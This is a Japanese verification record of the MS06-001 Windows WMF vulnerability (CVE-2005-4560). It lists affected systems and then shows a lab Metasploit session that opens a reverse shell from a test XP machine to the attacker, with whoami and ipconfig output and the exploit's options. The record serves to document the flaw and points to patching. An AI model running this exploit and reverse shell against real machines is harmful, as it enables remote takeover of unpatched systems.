MS06-001:Graphics Rendering Engine の脆弱性によりコードが実行される可能性がある

• 2006/03/04　初版
  • Author grin

• Graphics Rendering Engine の脆弱性に対するExploit
• 任意のコードを実行可能
• 今回の検証では攻撃先のコマンドシェルを攻撃元へリバースコネクトさせる

• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、および Microsoft Windows Millennium Edition (ME) - これらのオペレーティングシステムに関する詳細は、このセキュリティ情報の「よく寄せられる質問」をご覧ください。

• Microsoft::Microsoft Windows のセキュリティ修正プログラム
• CVE-2005-4560

• WindowsXP Professional SP1
• WindowsXP Professional SP2

• 攻撃元IPアドレス: 192.168.0.3（OS WindowsXP）
• 攻撃先IPアドレス: 192.168.0.12 (PC名 victim-xp)

msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.3:11111/
[*] HTTP Client connected from 192.168.0.12:1066, redirecting...
[*] HTTP Client connected from 192.168.0.12:1067, sending 1596 bytes of payload.
..
[*] Got connection from 192.168.0.3:4321 <-> 192.168.0.12:1068

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\デスクトップ>whoami
whoami
VICTIM-XP\Administrator

C:\Documents and Settings\Administrator\デスクトップ>hostname
hostname
victim-xp

C:\Documents and Settings\Administrator\デスクトップ>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.0.12
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1

1. MS06-001 パッチの適用 (Windows Update の実施)

今回のExploitはMetasploitを使用しました。 この検証記録に使用した設定内容は以下の通りです。

msf ie_xp_pfv_metafile(win32_reverse) > show options

Exploit and Payload Options
===========================

  Exploit:    Name        Default    Description
  --------    --------    -------    -------------------------------------------

  optional    REALHOST               External address to use for redirects (NAT)

  optional    HTTPHOST    0.0.0.0    The local HTTP listener host
  required    HTTPPORT    8080       The local HTTP listener port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------

  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LHOST                  Local address to receive connection
  required    LPORT       4321       Local port to receive connection

  Target: Automatic - Windows XP / Windows 2003 / Windows Vista

「calc.exe」を起動するコードを実行するデモ用ファイル